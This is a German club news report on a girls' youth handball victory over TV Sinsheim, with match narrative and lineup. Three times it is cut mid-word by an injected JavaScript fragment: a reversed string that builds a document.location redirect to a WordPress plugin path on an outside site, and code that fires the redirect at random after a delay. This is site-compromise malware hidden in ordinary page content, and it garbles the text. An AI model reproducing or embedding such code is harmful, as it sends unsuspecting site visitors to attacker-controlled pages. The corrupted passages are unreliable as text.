Was gibt es besseres, als an einem schönen Samstag um 10 Uhr Handball zu spielen? Genau…. einen Sieg gegen den bisher ungeschlagenen Tabellenführer TV Sinsheim mit nach Hause zu nehmen! (19:21) „Einer für Alle, Alle für Einen“-so lautet das Mottoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to der weiblichen D-Jugend der SG Neckargemünd-Mückenloch und genau so haben sie am Samstag gespielt.
Neckargemünd, 25.02.14 (cko) – Schon als wir uns vor dem Spiel in der Kabine trafen, um noch eine Ansprache zu halten, ist mir aufgefallen, dass alle Mädels hoch motiviert waren und den Willen hatten, die Sinsheimerinnen zu schlagen. Und wo ein Wille ist, da ist ein Weg.
So starteten die Mädels aus Neckargemünd und Mückenloch mit Vollgas in die erste Halbzeit und überliefen die Gegnerinnen förmlich. Durch viel Druck auf die Abwehr und durch das Stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toßen auf die Lücken verschaffte man sich immer wieder Freiräume. Auch die Abwehr bereitete den Sinsheimerinnen richtige Probleme. Man ging rechtzeitig auf die Gegenspielerin raus und machte sie fest. So lag man verdient zur Halbzeit in Führung.
In der Zweiten Halbzeit begann man -wie schon in der ersten Halbzeit- das Spiel mit viel Tempo und baute eine 6 Tore Führung auf. Doch durch eine sehr offensive Deckung der Mädels aus Sinsheim, konnte man nicht so richtig das Spiel aufbauen. Durch das viele Auswechseln/Einwechseln und durch viele technischen Fehler verlor man den roten Faden und den Gegnern gelang es wieder ins Spiel zu finden. So wurde es am Ende noch mal sehr spannend.
Doch durch einen Wurf aus der zweiten Reihe von Keilie, war das Ding durch und man konnte sich über einen verdienten Sieg über 19:21 freuen.
Mädels….Ihr könnt Stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolz auf euch sein!!
Es spielten:
Im Tor: Sandra Huber
Im Feld: Ronja G. ,Jasmin, Hanna, Saskia, Janina, Keilie, Ronja D., Lena, Jana, Helin